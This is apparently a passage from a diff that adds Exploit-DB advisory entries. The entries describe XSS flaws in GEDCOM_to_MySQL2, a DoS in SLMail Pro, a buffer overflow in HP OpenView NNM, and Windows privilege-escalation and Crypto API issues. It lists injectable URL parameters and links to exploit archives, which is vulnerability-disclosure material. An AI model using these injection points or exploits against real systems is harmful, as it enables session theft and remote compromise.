GEDCOM_to_MySQL2 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/GEDCOM_to_MySQL2/php/index.php?nom_branche=[XSS]

9
platforms/php/webapps/31732.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29048/info
GEDCOM_to_MySQL2 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/GEDCOM_to_MySQL2/php/info.php?nom_branche=[XSS]
http://www.example.com/GEDCOM_to_MySQL2/php/info.php?nom=[XSS]
http://www.example.com/GEDCOM_to_MySQL2/php/info.php?prenom=[XSS]

9
platforms/windows/dos/31563.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28505/info
SLMail Pro is prone to multiple remote denial-of-service vulnerabilities and memory-corruption vulnerabilities.
Attackers can exploit these issues to crash the application, resulting in denial-of-service conditions. Given the nature of some of these issues, attackers may also be able to execute arbitrary code, but this has not been confirmed.
SLMail Pro 6.3.1.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/31563.zip

9
platforms/windows/dos/31629.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28689/info
HP OpenView Network Node Manager is prone to a buffer-overflow vulnerability.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the Network Node Manager process. This facilitates the remote compromise of affected computers.
Network Node Manager 7.53 running on Microsoft Windows is affected by this issue; other versions and platforms may also be vulnerable.
http://www.exploit-db.com/sploits/31629.zip

7
platforms/windows/local/31667.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28833/info
Microsoft Windows is prone to a privilege-escalation vulnerability.
Successful exploits may allow authenticated users to elevate their privileges to NetworkService. This allows attackers to execute code with elevated privileges and aids in further exploits.
http://www.exploit-db.com/sploits/31667.zip

15
platforms/windows/remote/31583.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/28548/info
Microsoft's Crypto API library is prone to an information-disclosure vulnerability because HTTP requests to arbitrary hosts and ports may be automatically triggered when validating X.509 certificates.
Successful exploits allow attackers to trigger HTTP requests to arbitrary hosts and ports without confirmation or notification to unsuspecting users. Attackers may use this for determining when email and documents are read, for port scanning, or for aiding in other attacks.
The following products are known to exhibit this issue:
Microsoft Outlook 2007
Microsoft Windows Live Mail 2008
Microsoft Office 2007
Other products that use the Crypto API provided by Windows may also be affected.
http://www.exploit-db.com/sploits/31583.docx